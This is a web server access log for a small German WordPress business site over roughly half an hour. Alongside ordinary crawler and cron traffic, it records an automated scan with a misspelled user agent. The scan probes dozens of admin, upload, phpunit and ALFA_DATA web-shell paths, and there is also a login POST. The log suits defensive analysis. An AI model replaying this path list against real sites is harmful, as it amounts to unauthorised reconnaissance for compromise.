208.100.26.0 - - [07/Nov/2023:06:15:01 +0100] "GET / HTTP/1.1" 301 - "http://ipcbusiness.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.4101.79 Safari/537.36"
81.169.178.0 - - [07/Nov/2023:06:15:01 +0100] "POST /wp-cron.php?doing_wp_cron=1699334101.7379939556121826171875 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699334101.7379939556121826171875" "WordPress/5.8.8; https://www.ipcbusiness.de"
208.100.26.0 - - [07/Nov/2023:06:15:01 +0100] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.143 Safari/537.36"
208.100.26.0 - - [07/Nov/2023:06:15:02 +0100] "GET / HTTP/1.1" 200 16119 "https://ipcbusiness.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.4101.79 Safari/537.36"
208.100.26.0 - - [07/Nov/2023:06:15:02 +0100] "GET / HTTP/1.1" 200 16117 "https://ipcbusiness.de/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.143 Safari/537.36"
62.138.2.0 - - [07/Nov/2023:06:15:01 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [07/Nov/2023:06:15:03 +0100] "GET /it/ HTTP/1.1" 200 16222 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
35.176.196.0 - - [07/Nov/2023:06:16:16 +0100] "GET /npclient.html HTTP/1.1" 404 2561 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.196.0 - - [07/Nov/2023:06:19:10 +0100] "GET /npclient.html HTTP/1.1" 404 2561 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
207.46.13.0 - - [07/Nov/2023:06:19:33 +0100] "GET / HTTP/1.1" 200 2590 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
35.176.196.0 - - [07/Nov/2023:06:21:12 +0100] "GET /NPClient.html HTTP/1.1" 404 2561 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
81.169.178.0 - - [07/Nov/2023:06:22:09 +0100] "POST /wp-cron.php?doing_wp_cron=1699334529.4401099681854248046875 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699334529.4401099681854248046875" "WordPress/5.8.8; https://www.ipcbusiness.de"
13.79.17.0 - - [07/Nov/2023:06:22:09 +0100] "POST /wp-login.php HTTP/1.1" 503 7324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
35.176.196.0 - - [07/Nov/2023:06:23:37 +0100] "GET /NPClient.html HTTP/1.1" 404 2561 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.196.0 - - [07/Nov/2023:06:25:51 +0100] "GET /apps HTTP/1.1" 404 2543 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.196.0 - - [07/Nov/2023:06:28:05 +0100] "GET /apps HTTP/1.1" 404 2543 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
81.169.178.0 - - [07/Nov/2023:06:28:39 +0100] "POST /wp-cron.php?doing_wp_cron=1699334919.7277169227600097656250 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699334919.7277169227600097656250" "WordPress/5.8.8; https://www.ipcbusiness.de"
62.138.2.0 - - [07/Nov/2023:06:28:39 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [07/Nov/2023:06:28:40 +0100] "GET /pl/anfrage/ HTTP/1.1" 200 12493 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
35.176.196.0 - - [07/Nov/2023:06:30:11 +0100] "GET /index.html HTTP/1.1" 404 2555 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.196.0 - - [07/Nov/2023:06:33:05 +0100] "GET /index.html HTTP/1.1" 404 2555 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
52.167.144.0 - - [07/Nov/2023:06:33:06 +0100] "GET /robots.txt HTTP/1.1" 404 2595 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
35.176.196.0 - - [07/Nov/2023:06:34:55 +0100] "GET /index.asp HTTP/1.1" 404 2553 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
157.55.39.0 - - [07/Nov/2023:06:35:35 +0100] "GET / HTTP/1.1" 200 2590 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
62.138.2.0 - - [07/Nov/2023:06:35:57 +0100] "GET /it/datenschutzerklaerung/ HTTP/1.1" 200 16925 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
157.55.39.0 - - [07/Nov/2023:06:36:07 +0100] "GET /html/style.css HTTP/1.1" 200 458 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
52.167.144.0 - - [07/Nov/2023:06:36:11 +0100] "GET /assets/rollover.js HTTP/1.1" 200 5145 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
52.167.144.0 - - [07/Nov/2023:06:36:12 +0100] "GET /html/fusion.css HTTP/1.1" 200 1161 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
52.167.144.0 - - [07/Nov/2023:06:36:12 +0100] "GET /html/site.css HTTP/1.1" 200 88 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
216.244.66.0 - - [07/Nov/2023:06:37:38 +0100] "GET /robots.txt HTTP/1.1" 301 245 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.0 - - [07/Nov/2023:06:37:39 +0100] "GET /robots.txt HTTP/1.1" 200 67 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
35.176.196.0 - - [07/Nov/2023:06:37:46 +0100] "GET /index.asp HTTP/1.1" 404 2553 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.176.196.0 - - [07/Nov/2023:06:39:50 +0100] "GET /video.html HTTP/1.1" 404 2555 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
81.169.178.0 - - [07/Nov/2023:06:39:52 +0100] "POST /wp-cron.php?doing_wp_cron=1699335592.3395259380340576171875 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699335592.3395259380340576171875" "WordPress/5.2.19; https://www.computerdoc24.de"
89.246.241.0 - - [07/Nov/2023:06:39:52 +0100] "GET /aktuelle-angebote/ HTTP/1.1" 200 13458 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0"
13.95.88.0 - - [07/Nov/2023:06:39:54 +0100] "GET /.well-known/ HTTP/1.1" 200 6626 "http://ipc-business.de/.well-known/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:54 +0100] "GET /.well-known/pki-validation/ HTTP/1.1" 200 6626 "http://ipc-business.de/.well-known/pki-validation/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:54 +0100] "GET /.well-known/acme-challenge/ HTTP/1.1" 200 6626 "http://ipc-business.de/.well-known/acme-challenge/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:54 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.1" 200 6626 "http://ipc-business.de/vendor/phpunit/phpunit/src/Util/PHP/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:54 +0100] "GET /wp-content/uploads/ HTTP/1.1" 403 2636 "http://ipc-business.de/wp-content/uploads/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:54 +0100] "GET /wp-admin/ HTTP/1.1" 403 6626 "http://ipc-business.de/wp-admin/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:55 +0100] "GET /wordpress/wp-admin/includes HTTP/1.1" 200 6626 "http://ipc-business.de/wordpress/wp-admin/includes" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:55 +0100] "GET /wp-admin/js/ HTTP/1.1" 403 2622 "http://ipc-business.de/wp-admin/js/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:55 +0100] "GET /ALFA_DATA/ HTTP/1.1" 200 6626 "http://ipc-business.de/ALFA_DATA/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:56 +0100] "GET /wp-content/upgrade/ HTTP/1.1" 403 2636 "http://ipc-business.de/wp-content/upgrade/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:56 +0100] "GET /wp-admin/css/colors/ HTTP/1.1" 403 2638 "http://ipc-business.de/wp-admin/css/colors/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:56 +0100] "GET /wp-includes/ HTTP/1.1" 403 2622 "http://ipc-business.de/wp-includes/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:56 +0100] "GET /wp-includes/css/ HTTP/1.1" 403 2630 "http://ipc-business.de/wp-includes/css/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:56 +0100] "GET /wp-includes/ID3 HTTP/1.1" 301 251 "http://ipc-business.de/wp-includes/ID3" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:56 +0100] "GET /wp-includes/ID3/ HTTP/1.1" 403 2636 "https://www.ipcbusiness.de/wp-includes/ID3" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:56 +0100] "GET /wp-includes/IXR/ HTTP/1.1" 403 2630 "http://ipc-business.de/wp-includes/IXR/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:56 +0100] "GET /wp-includes/Requests/ HTTP/1.1" 403 2640 "http://ipc-business.de/wp-includes/Requests/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:56 +0100] "GET /wp-includes/SimplePie/ HTTP/1.1" 403 2642 "http://ipc-business.de/wp-includes/SimplePie/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:56 +0100] "GET /wp-includes/Text/ HTTP/1.1" 403 2632 "http://ipc-business.de/wp-includes/Text/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:56 +0100] "GET /wp-includes/Text/Diff/Renderer/ HTTP/1.1" 403 2660 "http://ipc-business.de/wp-includes/Text/Diff/Renderer/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:56 +0100] "GET /wp-includes/blocks/ HTTP/1.1" 500 - "http://ipc-business.de/wp-includes/blocks/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:57 +0100] "GET /wp-includes/certificates/ HTTP/1.1" 403 2648 "http://ipc-business.de/wp-includes/certificates/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:57 +0100] "GET /wp-includes/customize/ HTTP/1.1" 403 2642 "http://ipc-business.de/wp-includes/customize/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:57 +0100] "GET /wp-includes/fonts/ HTTP/1.1" 403 2634 "http://ipc-business.de/wp-includes/fonts/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:57 +0100] "GET /wp-includes/images/ HTTP/1.1" 403 2636 "http://ipc-business.de/wp-includes/images/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:57 +0100] "GET /wp-includes/pomo/ HTTP/1.1" 403 2632 "http://ipc-business.de/wp-includes/pomo/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:57 +0100] "GET /wp-includes/rest-api/ HTTP/1.1" 403 2640 "http://ipc-business.de/wp-includes/rest-api/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:57 +0100] "GET /wp-includes/widgets/ HTTP/1.1" 403 2638 "http://ipc-business.de/wp-includes/widgets/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:57 +0100] "GET /wp-admin/css/ HTTP/1.1" 403 2624 "http://ipc-business.de/wp-admin/css/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:57 +0100] "GET /wp-admin/images/ HTTP/1.1" 403 2630 "http://ipc-business.de/wp-admin/images/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:57 +0100] "GET /wp-admin/maint/ HTTP/1.1" 403 2628 "http://ipc-business.de/wp-admin/maint/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:57 +0100] "GET /wp-admin/meta/ HTTP/1.1" 200 6626 "http://ipc-business.de/wp-admin/meta/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:57 +0100] "GET /wp-admin/network/ HTTP/1.1" 403 6626 "http://ipc-business.de/wp-admin/network/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:57 +0100] "GET /wp-admin/user/ HTTP/1.1" 403 6626 "http://ipc-business.de/wp-admin/user/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:57 +0100] "GET /wp-content/ HTTP/1.1" 200 - "http://ipc-business.de/wp-content/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:58 +0100] "GET /wp-content/uploads/ao_ccss/ HTTP/1.1" 200 6626 "http://ipc-business.de/wp-content/uploads/ao_ccss/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:58 +0100] "GET /wp-content/uploads/2021/ HTTP/1.1" 200 6626 "http://ipc-business.de/wp-content/uploads/2021/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:58 +0100] "GET /wp-content/plugins/elementor/ HTTP/1.1" 200 6626 "http://ipc-business.de/wp-content/plugins/elementor/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:58 +0100] "GET /wp-content/plugins/ HTTP/1.1" 200 - "http://ipc-business.de/wp-content/plugins/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:58 +0100] "GET /wp-content/mu-plugins/ HTTP/1.1" 200 6626 "http://ipc-business.de/wp-content/mu-plugins/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:58 +0100] "GET /wp-content/themes/ HTTP/1.1" 200 - "http://ipc-business.de/wp-content/themes/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:58 +0100] "GET /upload/image/ HTTP/1.1" 200 6626 "http://ipc-business.de/upload/image/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:58 +0100] "GET /uploads/ HTTP/1.1" 200 6626 "http://ipc-business.de/uploads/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:58 +0100] "GET /wordpress/wp-content/uploads/ HTTP/1.1" 200 6626 "http://ipc-business.de/wordpress/wp-content/uploads/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:58 +0100] "GET /wordpress/wp-includes/ HTTP/1.1" 200 6626 "http://ipc-business.de/wordpress/wp-includes/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:58 +0100] "GET /blog/wp-includes/ HTTP/1.1" 200 6626 "http://ipc-business.de/blog/wp-includes/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:58 +0100] "GET /wp-admin/includes/ HTTP/1.1" 403 2634 "http://ipc-business.de/wp-admin/includes/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:58 +0100] "GET /WordPress/wp-admin/includes/ HTTP/1.1" 200 6626 "http://ipc-business.de/WordPress/wp-admin/includes/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:58 +0100] "GET /sites/default/files/ HTTP/1.1" 200 6626 "http://ipc-business.de/sites/default/files/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /admin/controller/extension/extension/ HTTP/1.1" 200 6626 "http://ipc-business.de/admin/controller/extension/extension/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /admin/ HTTP/1.1" 200 6626 "http://ipc-business.de/admin/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /admin/editor/ HTTP/1.1" 200 6626 "http://ipc-business.de/admin/editor/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /admin/images/slider/ HTTP/1.1" 200 6626 "http://ipc-business.de/admin/images/slider/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /admin/tmp/ HTTP/1.1" 200 6626 "http://ipc-business.de/admin/tmp/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /admin/uploads/ HTTP/1.1" 200 6626 "http://ipc-business.de/admin/uploads/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /Admin/uploads/ HTTP/1.1" 200 6626 "http://ipc-business.de/Admin/uploads/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /admin/uploads/images/ HTTP/1.1" 200 6626 "http://ipc-business.de/admin/uploads/images/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /administrator/ HTTP/1.1" 200 6626 "http://ipc-business.de/administrator/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.95.88.0 - - [07/Nov/2023:06:39:59 +0100] "GET /ALFA_DATA/alfacgiapi/ HTTP/1.1" 200 6626 "http://ipc-business.de/ALFA_DATA/alfacgiapi/" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
